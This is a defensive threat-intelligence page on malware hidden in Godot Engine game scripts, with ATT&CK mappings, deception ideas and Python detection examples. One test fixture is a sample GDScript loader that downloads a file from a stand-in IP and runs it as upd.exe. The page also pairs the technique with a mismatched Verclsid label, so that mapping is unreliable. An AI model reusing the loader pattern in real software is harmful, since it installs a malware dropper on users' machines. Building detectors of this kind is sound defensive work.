Undetected Playground for Malware

Subject: Undetected Playground for Malware

Tactics: TA0005 Defense Evasion, TA0001 Initial Access

Technique: T1218.012 System Binary Proxy Execution: Verclsid

Procedure:

  • Threat actors embedded malicious GDScript code within the Godot Engine, a legitimate piece of software.
  • Upon execution of the Godot Engine, the GDScript is loaded, which then downloads and executes a malicious payload.
  • This technique has been successful in remaining undetected by most antivirus tools.
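The procedure above is observable as a sequence in endpoint telemetry: an engine-built game process makes an outbound connection and then launches a new executable. The following correlation rule is an added example for this page, not code from the Check Point report or from the Godot project. The event records and their field names (ts, event, pid, ppid, image, product, dest) are constructed for illustration and are an assumption rather than a fixed sensor schema; real sensors expose comparable data (Sysmon's process-creation event carries a Product field taken from the binary's version resource).

```python
"""Added example: correlate process-creation and network-connection telemetry
to flag a Godot-engine process that connects out and then spawns a child.
Event schema and sample data are constructed for this example (assumption)."""

WINDOW_SECONDS = 60  # a child spawned within this long after the last connection correlates


def is_engine_process(ev):
    """True for a process-creation event whose binary identifies itself as the
    Godot Engine. The 'product' field is the constructed stand-in for what a
    sensor reads from the PE version resource (assumption)."""
    return ev["event"] == "process_create" and "godot" in ev.get("product", "").lower()


def detect_engine_download_and_execute(events):
    """Return one alert per child process spawned by a Godot-engine process
    shortly after that process made an outbound network connection."""
    engine_images = {}   # pid -> image path of processes identified as the engine
    last_connect = {}    # pid -> (ts, dest) of the engine process's latest connection
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        # Child of a known engine process: correlate with the parent's last connection.
        if ev["event"] == "process_create" and ev.get("ppid") in engine_images:
            conn = last_connect.get(ev["ppid"])
            if conn is not None and 0 <= ev["ts"] - conn[0] <= WINDOW_SECONDS:
                alerts.append({
                    "parent_pid": ev["ppid"],
                    "parent_image": engine_images[ev["ppid"]],
                    "dest": conn[1],
                    "child_pid": ev["pid"],
                    "child_image": ev["image"],
                })
        # Track engine processes and their outbound connections.
        if is_engine_process(ev):
            engine_images[ev["pid"]] = ev["image"]
        elif ev["event"] == "network_connect" and ev["pid"] in engine_images:
            last_connect[ev["pid"]] = (ev["ts"], ev["dest"])
    return alerts


# Constructed sample telemetry (not real data): pid 10 is a Godot-built game that
# connects out and then runs a freshly written binary; pid 30 is a Godot game that
# only talks to the network; pid 40 is a browser that connects and spawns a helper.
SAMPLE_EVENTS = [
    {"ts": 100, "event": "process_create", "pid": 10, "ppid": 1,
     "image": r"C:\Games\Catch\Catch.exe", "product": "Godot Engine"},
    {"ts": 103, "event": "network_connect", "pid": 10, "dest": "203.0.113.10:443"},
    {"ts": 109, "event": "process_create", "pid": 20, "ppid": 10,
     "image": r"C:\Users\a\AppData\Local\Temp\upd.exe", "product": ""},
    {"ts": 200, "event": "process_create", "pid": 30, "ppid": 1,
     "image": r"C:\Games\Puzzle\Puzzle.exe", "product": "Godot Engine"},
    {"ts": 204, "event": "network_connect", "pid": 30, "dest": "198.51.100.7:443"},
    {"ts": 300, "event": "process_create", "pid": 40, "ppid": 1,
     "image": r"C:\Program Files\Browser\browser.exe", "product": "Browser"},
    {"ts": 301, "event": "network_connect", "pid": 40, "dest": "198.51.100.9:443"},
    {"ts": 302, "event": "process_create", "pid": 41, "ppid": 40,
     "image": r"C:\Program Files\Browser\helper.exe", "product": "Browser"},
]

if __name__ == "__main__":
    for alert in detect_engine_download_and_execute(SAMPLE_EVENTS):
        print(alert)
```

Only pid 10 produces an alert: pid 30 connects but spawns nothing, and pid 40 is not an engine process, so the rule keys on the engine-specific parent rather than on "connect then spawn" in general, which keeps browsers and updaters out of the results.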

Vulnerability:

  • EAV0001: When adversaries interact with the environment or personas, they are vulnerable when they collect, observe, or manipulate system artifacts or information. Manipulated data may cause them to reveal behaviors, use additional or more advanced capabilities against the target, and/or impact their dwell time.
  • EAV0013: When adversaries rely on specific resources to be enabled, accessible, and/or vulnerable, they are vulnerable to their operations being disrupted if the resources are disabled, removed, or otherwise made invulnerable.

Engagement Opportunity:

  • Honeypot: Create a decoy environment using the Godot Engine. Instrument components within this environment to capture attacker actions, analyze their TTPs, and gather intelligence on their tools and techniques.

  • Misinformation: Within the Godot Engine environment, introduce subtle alterations or plant misleading information. This could disrupt attacker operations, misdirect their efforts, or potentially gather intelligence on their objectives and motives.

Threat Actor: Stargazers Ghost Network

Threat Objective:

  1. Deliver and execute malware
  2. Potential objectives include credential theft, ransomware encryption, or other malicious activities.

Deception Opportunity:

  • Decoy Files: Plant decoy files within the Godot Engine environment that mimic sensitive data or valuable assets to lure attackers, misdirect their attention, and potentially expose their tools and techniques.

  • False Environment: Create a false, instrumented environment within the Godot Engine that appears to be a legitimate target. Isolate and monitor this environment to deceive attackers, study their behaviors, and gather threat intelligence.

Sensor Data Placement: Application

Observable Level: Core to Adversary-Brought Tool

Scoring Rationale:

  • The use of the Godot Engine as an attack vector is specific to the adversary’s toolset, making it detectable if the tool is known.
  • The presence of malicious GDScript is also tied to the adversary’s tool and can be detected through code analysis.
  • Network connections to attacker infrastructure are observable at the User-Mode level and can be detected through network monitoring.
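The second point above, detecting malicious GDScript through code analysis, can be approached with a static capability scan over the script sources. The scanner below is an added example for this page, not code from the report or the Godot project. It assumes the scripts have already been extracted from the game's .pck as text (Godot can also export GDScript in a compiled form, which this scan does not cover). The indicator patterns use real Godot 4 API names; the two sample scripts and their paths are constructed for illustration.

```python
"""Added example: static capability scan over extracted GDScript text.
Sample scripts are constructed; the API names in INDICATORS are real Godot 4 APIs."""
import re

# Capability indicators grouped by what they let a script do.
INDICATORS = {
    "network": [r"\bHTTPRequest\b", r"\bHTTPClient\b", r"\bStreamPeerTCP\b"],
    "file_write": [r"\bFileAccess\.open\s*\([^)]*\bFileAccess\.WRITE\b", r"\bDirAccess\b"],
    "exec": [r"\bOS\.execute\b", r"\bOS\.create_process\b", r"\bOS\.shell_open\b"],
    "env_probe": [r"\bOS\.get_environment\b", r"\bOS\.get_processor_count\b",
                  r"\bOS\.get_unique_id\b", r"\bOS\.get_name\b"],
    "decode": [r"\bMarshalls\.base64_to_raw\b", r"\bAESContext\b"],
}
COMPILED = {cat: [re.compile(p) for p in pats] for cat, pats in INDICATORS.items()}


def scan_script(source):
    """Return the capability categories a script uses and whether it shows the
    download-then-execute chain this page describes (network plus exec)."""
    hits = {cat for cat, pats in COMPILED.items() if any(p.search(source) for p in pats)}
    return {
        "categories": sorted(hits),
        "download_and_execute": {"network", "exec"} <= hits,
    }


def scan_scripts(scripts):
    """scripts: {path: source text}. Returns {path: scan result}."""
    return {path: scan_script(src) for path, src in scripts.items()}


def flagged(scripts):
    """Paths whose scripts show the download-then-execute chain, sorted."""
    return sorted(p for p, r in scan_scripts(scripts).items() if r["download_and_execute"])


# Constructed sample scripts (not from any real game): a benign leaderboard
# client and a loader-style script that probes the host, fetches a file,
# writes it to the user data directory and launches it.
SAMPLE_SCRIPTS = {
    "res://scripts/leaderboard.gd": """
extends Node
func _ready():
    var req = HTTPRequest.new()
    add_child(req)
    req.request("https://scores.example/top")
""",
    "res://scripts/loader.gd": """
extends Node
func _ready():
    if OS.get_processor_count() < 2:
        return
    var req = HTTPRequest.new()
    add_child(req)
    req.request_completed.connect(_on_done)
    req.request("https://203.0.113.10/update.bin")
func _on_done(result, code, headers, body):
    var f = FileAccess.open("user://upd.exe", FileAccess.WRITE)
    f.store_buffer(body)
    f.close()
    OS.create_process(OS.get_user_data_dir() + "/upd.exe", [])
""",
}

if __name__ == "__main__":
    for path, result in scan_scripts(SAMPLE_SCRIPTS).items():
        print(path, result)
    print("flagged:", flagged(SAMPLE_SCRIPTS))
```

A single network hit is not a finding on its own, since games legitimately talk to servers; the scan only raises a script when network and process-execution capability appear together, and it reports the environment-probing and file-writing categories alongside so an analyst can see the full chain at a glance.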

Observable Level:

  • Godot Engine as an attack vector: Core to Adversary-Brought Tool
  • Presence of malicious GDScript: Core to Adversary-Brought Tool
  • Network connections to attacker C2 infrastructure: Core to Adversary-Brought Tool

Link to Report: https://research.checkpoint.com/2024/gaming-engines-an-undetected-playground-for-malware-loaders/

Link to Report II.:

Additional Comments:

  • The threat actor demonstrated continuous evolution of their TTPs, including evasion techniques and encryption methods.
  • The use of legitimate platforms like Bitbucket for hosting payloads highlights the increasing sophistication of attackers.

Possible elements:

MSG (Pseudocode):

# Malicious Sub-Graph Standard

# Node Format:
# [Node ID]: [Tactic] - [Technique] - [Procedure] ([Observable Level])

# Edge Format:
# [Source Node ID] --> [Destination Node ID] ([Exploited Vulnerability])

# Stargazers Ghost Network Attack Graph

[1]: Initial Access - System Binary Proxy Execution - Execute malicious GDScript within Godot Engine (Core to Adversary-Brought Tool)
[2]: Execution - User Execution - User downloads and executes malicious Godot game or legitimate game with modified .pck file (Lack of User Awareness)
[3]: Defense Evasion - Obfuscated Files or Information - GDScript employs anti-sandbox and anti-VM techniques (Core to Adversary-Brought Tool)
[4]: Command and Control - Application Layer Protocol - Communicate with C2 server to download additional payloads (Core to Adversary-Brought Tool)
[5]: Impact - Data Encrypted for Impact - Deploy ransomware or other malware for malicious activities (Core to Adversary-Brought Tool)

1 --> 2 (Lack of User Awareness)
2 --> 3 (Lack of User Awareness)
3 --> 4 (Unfamiliarity with Godot Engine as an attack vector)
4 --> 5 (Unfamiliarity with Godot Engine as an attack vector)

# Pseudocode Standard

# Function Format:
# function [Tactic]_[Technique]([Input]):
#     [Procedure]
#     return [Output]

# Stargazers Ghost Network Pseudocode

function Initial_Access_System_Binary_Proxy_Execution():
    # Embed malicious GDScript within Godot Engine
    return malicious_Godot_game

function Execution_User_Execution(malicious_Godot_game):
    # User downloads and executes malicious_Godot_game
    return execution_of_GDScript

function Defense_Evasion_Obfuscated_Files_or_Information(execution_of_GDScript):
    # Employ anti-sandbox and anti-VM techniques within GDScript
    return C2_communication

function Command_and_Control_Application_Layer_Protocol(C2_communication):
    # Establish connection with C2 server to download additional payloads
    return malicious_payload

function Impact_Data_Encrypted_for_Impact(malicious_payload):
    # Execute malicious_payload (e.g., ransomware)
    return impact_achieved
